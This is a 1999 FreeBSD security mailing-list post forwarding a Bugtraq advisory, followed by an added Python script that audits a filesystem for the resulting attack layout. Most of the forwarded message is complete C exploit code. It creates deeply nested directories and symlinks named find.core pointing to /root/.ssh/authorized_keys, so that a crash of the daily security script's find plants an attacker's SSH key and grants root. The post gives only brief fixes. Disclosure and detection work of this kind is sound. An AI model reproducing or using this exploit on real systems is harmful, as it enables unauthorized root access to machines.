Date: Thu, 26 Aug 1999 12:45:37 -0400
From: Forrest Aldrich <forrie@forrie.com>
To: freebsd-security@freebsd.org
Subject: Fwd: FreeBSD (and other BSDs?) local root explot
Message-ID: <4.2.0.58.19990826124527.00aa85b0@216.67.12.69>
>Approved-By: aleph1@SECURITYFOCUS.COM
>Delivered-To: bugtraq@securityfocus.com
>X-Mailer: XFMail 1.3 [p0] on Linux
>X-SMS: +48601383657@text.plusgsm.pl
>X-PGP: PGP key on WWW or finger
>X-Operating-System: FreeBSD 3.2-STABLE (i386)
>Date: Tue, 24 Aug 1999 23:47:05 +0200
>Reply-To: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL>
>Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
>From: Przemyslaw Frasunek <secure@FREEBSD.LUBLIN.PL>
>Organization: Lubelska Grupa Uzytkownikow BSD
>Subject: FreeBSD (and other BSDs?) local root explot
>X-To: bugtraq@securityfocus.com
>To: BUGTRAQ@SECURITYFOCUS.COM
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>/*
>
> (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>
>
> bug in fts_print function allows to overwrite any file in system, when
> running /etc/security script (executed from 'daily' scripts).
>
> affected systems:
>    - freebsd (all versions)
>    - probably openbsd/netbsd
>
> fix:
>    - limit root's coredump size
>    - patch libc
>
>*/
>
>#include <stdio.h>
>#include <errno.h>
>#include <sys/stat.h>
>#include <strings.h>
>#include <unistd.h>
>
>#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
>#define FILE "/root/.ssh/authorized_keys"
>#define CORE "find.core"
>#define DEPTH 300
>#define BUFSIZE 250
>
>int makedir(dir, linkfrom, linkto)
>char *dir, *linkfrom, *linkto;
>{
>
>    if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
>        return -1;
>
>    if (chdir(dir))
>        return -1;
>
>    if (symlink(linkfrom, linkto) < 0)
>        return -1;
>
>    return 0;
>}
>
>
>int main(argc, argv)
>int argc;
>char **argv;
>{
>    int i = 0;
>    char pid[10], buf[BUFSIZE];
>
>    sprintf(pid, "%d", getpid());
>
>    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
>    {
>        perror("mkdir()");
>        return -1;
>    }
>
>    if (chdir(pid))
>    {
>        perror("chdir()");
>        return -1;
>    }
>
>    bzero(buf, BUFSIZE);
>    memset(buf, 0x41, BUFSIZE-1);
>
>    for(i=0;i<DEPTH;i++)
>    {
>        if (makedir(STRING, FILE, CORE) < 0)
>        {
>            perror("makedir()");
>            return -1;
>        }
>
>        if(makedir(buf, FILE, CORE) < 0)
>        {
>            perror("makedir()");
>            return -1;
>        }
>    }
>
>    return 0;
>}
>
>- ---
>* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
>* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGPfreeware 5.0i for non-commercial use
>Charset: noconv
>
>iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
>JkgnTo+Dk3QUFGT2bZdmxx9S
>=Tyvh
>-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
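
A defensive audit for the filesystem layout the forwarded program creates, added here as an example and not part of the original message: it walks a tree without following symlinks and reports symlinks named `*.core`, directory names containing control characters, and nesting at or beyond a threshold. The function name `audit_tree` and the `max_depth` default are assumptions chosen for illustration.

```python
import os
import stat


def audit_tree(root, max_depth=32):
    """Walk root without following symlinks; return (kind, path, detail) tuples."""
    root = os.path.abspath(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        rel = os.path.relpath(dirpath, root)
        depth = 0 if rel == "." else rel.count(os.sep) + 1

        for name in dirnames:
            # The forwarded program uses a directory name that starts with a newline.
            if any(ord(ch) < 32 for ch in name):
                findings.append(
                    ("control-char-name", os.path.join(dirpath, name), repr(name)))

        # os.walk lists symlinks to directories in dirnames, all others in filenames.
        for name in dirnames + filenames:
            if not name.endswith(".core"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if stat.S_ISLNK(os.lstat(path).st_mode):
                    # A core-file name that is a symlink points the dump elsewhere.
                    findings.append(("core-symlink", path, os.readlink(path)))
            except OSError:
                continue  # entry vanished or is unreadable; skip it

        if depth >= max_depth:
            # Very deep nesting is what the forwarded program builds (DEPTH 300).
            findings.append(("deep-tree", dirpath, "depth %d" % depth))
            dirnames[:] = []  # do not descend further
    return findings


if __name__ == "__main__":
    import sys
    for kind, path, detail in audit_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%s\t%r\t%s" % (kind, path, detail))
```

Paths are printed with `%r` so that embedded newlines in a name cannot forge extra report lines.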